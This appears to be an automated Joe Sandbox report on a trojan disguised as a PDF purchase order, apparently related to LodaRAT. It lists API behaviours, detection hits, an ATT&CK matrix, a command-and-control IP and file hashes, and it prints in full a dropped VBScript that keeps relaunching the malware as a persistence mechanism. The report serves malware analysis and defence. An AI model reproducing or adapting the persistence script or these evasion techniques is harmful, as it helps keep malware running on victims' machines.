              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00CAF78E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00CF7F0E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00CB1E5A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Window / User API: threadDelayed 6867
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Window / User API: foregroundWindowGot 1772
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | API coverage: 6.2 %
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe TID: 7040 | Thread sleep time: -68670s >= -30000s
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Thread sleep count: Count: 6867 delay: -10
              Source: Yara match | File source: 00000003.00000002.2476240013.0000000003460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2471256103.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2471256103.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2485820292.0000000004D11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6900, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, type: DROPPED
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CADD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00CADD92
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00CE2044
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00CE219F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00CE24A9
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00CD6B3F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00CD6E4A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00CDF350
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00CDFDD2
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CDFD47 FindFirstFileW,FindClose,1_2_00CDFD47
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00CAE47B
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %SystemRoot%\System32\winrnr.dllHyper-V RAW
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | API call chain: ExitProcess graph end node graph_1-110108
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | API call chain: ExitProcess graph end node graph_1-110518
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CE703C BlockInput,1_2_00CE703C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00C9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00C9374E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_00CC46D0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CF20F6 LoadLibraryA,GetProcAddress,1_2_00CF20F6
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CBA937 GetProcessHeap,1_2_00CBA937
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CB8E19 SetUnhandledExceptionFilter,1_2_00CB8E19
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00CB8E3C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CCBE95 LogonUserW,1_2_00CCBE95
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00C9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00C9374E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CD4B52 SendInput,keybd_event,1_2_00CD4B52
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CD7DD5 mouse_event,1_2_00CD7DD5
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CCB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00CCB398
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CCBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00CCBE31
              Source: Purchase Order Supplies.Pdf.exe | Binary or memory string: Shell_TrayWnd
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CB7254 cpuid 1_2_00CB7254
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CB40DA GetSystemTimeAsFileTime,__aulldiv,1_2_00CB40DA
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00D0C146 GetUserNameW,1_2_00D0C146
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00CC2C3C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00CAE47B
              Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
              Source: Purchase Order Supplies.Pdf.exe | Binary or memory string: WIN_XP
              Source: Purchase Order Supplies.Pdf.exe | Binary or memory string: WIN_XPe
              Source: Purchase Order Supplies.Pdf.exe | Binary or memory string: WIN_VISTA
              Source: Purchase Order Supplies.Pdf.exe | Binary or memory string: WIN_7
              Source: Purchase Order Supplies.Pdf.exe | Binary or memory string: WIN_8

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00CE91DC
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00CE96E2
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information11
              Scripting
              2
              Valid Accounts
              11
              Windows Management Instrumentation
              11
              Scripting
              1
              Exploitation for Privilege Escalation
              1
              Disable or Modify Tools
              21
              Input Capture
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol21
              Input Capture
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts
              2
              Valid Accounts
              121
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              SteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder
              21
              Access Token Manipulation
              1
              Software Packing
              NTDS17
              System Information Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets51
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder
              21
              Masquerading
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Virtualization/Sandbox Evasion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Source | Detection | Scanner | Label | Link
              Purchase Order Supplies.Pdf.exe | 100% | Joe Sandbox ML | |
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\KKRBIX.vbs | 100% | Avira | VBS/Runner.VPJI |
              C:\Users\user\AppData\Roaming\Windata\Google Update.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://ip-score.com/checkip/: | Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              172.111.138.100 | unknown | United States | | 3223 | VOXILITYGB | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1541228
                Start date and time:2024-10-24 15:37:46 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Purchase Order Supplies.Pdf.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@3/2@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 88
                • Number of non-executed functions: 271
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: Purchase Order Supplies.Pdf.exe
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                172.111.138.100 | bf-p2b.exe | malicious | LodaRAT |
                172.111.138.100 | gry.exe | malicious | Unknown |
                172.111.138.100 | dlawt.exe | malicious | LodaRat |
                172.111.138.100 | nXi3rwhMmB.exe | malicious | LodaRat |
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                VOXILITYGB | zR4aIjCuRs.exe | malicious | Remcos, GuLoader | 45.74.58.7
                VOXILITYGB | 5s5Ut98vVh.bat | malicious | Unknown | 172.94.3.25
                VOXILITYGB | Marys Organizer 2023 Release.zip | malicious | Remcos | 45.74.48.2
                VOXILITYGB | Dlr7HYI6VL.lnk | malicious | Remcos | 172.94.3.25
                VOXILITYGB | MdkbG2pK4l.lnk | malicious | Remcos | 172.94.3.25
                VOXILITYGB | 55Ka50lb6Z.bat | malicious | Remcos | 172.94.3.25
                VOXILITYGB | zz91Dcv5Kf.dll | malicious | Remcos | 172.94.9.207
                VOXILITYGB | V9HUU0LCin.dll | malicious | Remcos | 172.94.9.207
                VOXILITYGB | E5r67vtBtc6.exe | malicious | Xmrig | 172.94.15.211
                VOXILITYGB | Miner-XMR2.exe | malicious | Xmrig | 172.94.15.211
                No context
                No context
                        Process:C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):862
                        Entropy (8bit):5.3210325672744965
                        Encrypted:false
                        SSDEEP:24:dF/UrLvU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/U8t+G+7xLxe0WABNVIqZaVzgA
                        MD5:A2E6DF552F3F3C3C5093B3C8CABB4E29
                        SHA1:7C3C9CF157C8E3B0C99FD9F23232711DA632234E
                        SHA-256:3BCE9C5F93FC18951A825E965F31D9F5894B33CE74087021C081CFE98B1FD5FF
                        SHA-512:91804410DA32C325783968C7EDF06102F818325DE007B2E7E8542200F519F2F05D04ACA02490F8F41F24B713A774F77C6E4A3D8CD4B96E3E4A827EF6F475C07D
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, Author: Joe Security
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Reputation:low
                        Preview:
                        On error resume next
                        Dim strComputer,strProcess,fileset
                        strProcess = "Purchase Order Supplies.Pdf.exe"
                        fileset = """C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe"""
                        strComputer = "."
                        Dim objShell
                        Set objShell = CreateObject("WScript.Shell")
                        Dim fso
                        Set fso = CreateObject("Scripting.FileSystemObject")
                        while 1
                        IF isProcessRunning(strComputer,strProcess) THEN
                        ELSE
                        objShell.Run fileset
                        END IF
                        Wend
                        FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)
                        DIM objWMIService, strWMIQuery
                        strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"
                        SET objWMIService = GETOBJECT("winmgmts:" _
                        & "{impersonationLevel=impersonate}!\\" _
                        & strComputer & "\root\cimv2")
                        IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN
                        isProcessRunning = TRUE
                        ELSE
                        isProcessRunning = FALSE
                        END IF
                        END FUNCTION
                        Process:C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:dropped
                        Size (bytes):945664
                        Entropy (8bit):7.851519096340525
                        Encrypted:false
                        SSDEEP:24576:thloDX0XOf4mHACXg4eCkA6p5lH2udk3W:thloJfzACXKv8B
                        MD5:A842353A8FD25A6B05D0D3CE6AFE8AAD
                        SHA1:453B9ACEB8565D9F838E5BBCD8F694D97741ADA9
                        SHA-256:9169A54C077380847A9D8D532FD0E5558D60F881FF6DCC029B2E04C9F9FB8104
                        SHA-512:CEB261CDDBBB9942FDDC7ADB92D4CC64B2C32051D9F52B5BA39C58D38927FE937ABEEB457B21AA9CE9A5B1E2F07E5F8E08466709F3B7EA9B5254508D14D102BD
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...9..g.........."......P...0...P.......`........@.......................................@...@.......@.....................,...$.......,!..................P...........................................H...........................................UPX0.....P..............................UPX1.....P...`...D..................@....rsrc....0.......&...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.851519096340525
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.39%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        File name:Purchase Order Supplies.Pdf.exe
                        File size:945'664 bytes
                        MD5:a842353a8fd25a6b05d0d3ce6afe8aad
                        SHA1:453b9aceb8565d9f838e5bbcd8f694d97741ada9
                        SHA256:9169a54c077380847a9d8d532fd0e5558d60f881ff6dcc029b2e04c9f9fb8104
                        SHA512:ceb261cddbbb9942fddc7adb92d4cc64b2c32051d9f52b5ba39c58d38927fe937abeeb457b21aa9ce9a5b1e2f07e5f8e08466709f3b7ea9b5254508d14d102bd
                        SSDEEP:24576:thloDX0XOf4mHACXg4eCkA6p5lH2udk3W:thloJfzACXKv8B
                        TLSH:8E15E1E5A780C464E86795B9943BDAA7B433A60ECCA8490C3C95FF0B7D723471027D9B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                        Icon Hash:2eec8e8cb683b9b1
                        Entrypoint:0x56a0c0
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6715EB39 [Mon Oct 21 05:48:41 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                        Instruction
                        pushad
                        mov esi, 00516000h
                        lea edi, dword ptr [esi-00115000h]
                        push edi
                        jmp 00007FDB510205BDh
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB5102059Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007FDB510205BDh
                        jne 00007FDB510205DAh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB510205D1h
                        dec eax
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007FDB51020586h
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007FDB51020604h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007FDB510205C3h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007FDB51020627h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007FDB510205BDh
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB5102057Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB51020570h
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007FDB510205A1h
                        jne 00007FDB510205BBh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007FDB51020596h
                        add ecx, 02h
                        cmp ebp, FFFFFB00h
                        adc ecx, 02h
                        lea edx, dword ptr [edi+ebp]
                        cmp ebp, FFFFFFFCh
                        jbe 00007FDB510205C0h
                        mov al, byte ptr [edx]
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2012 UPD4 build 61030
                        • [RES] VS2012 UPD4 build 61030
                        • [LNK] VS2012 UPD4 build 61030
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1fd12c | 0x424 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16b000 | 0x9212c | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1fd550 | 0xc | .rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x16a2a4 | 0x48 | UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
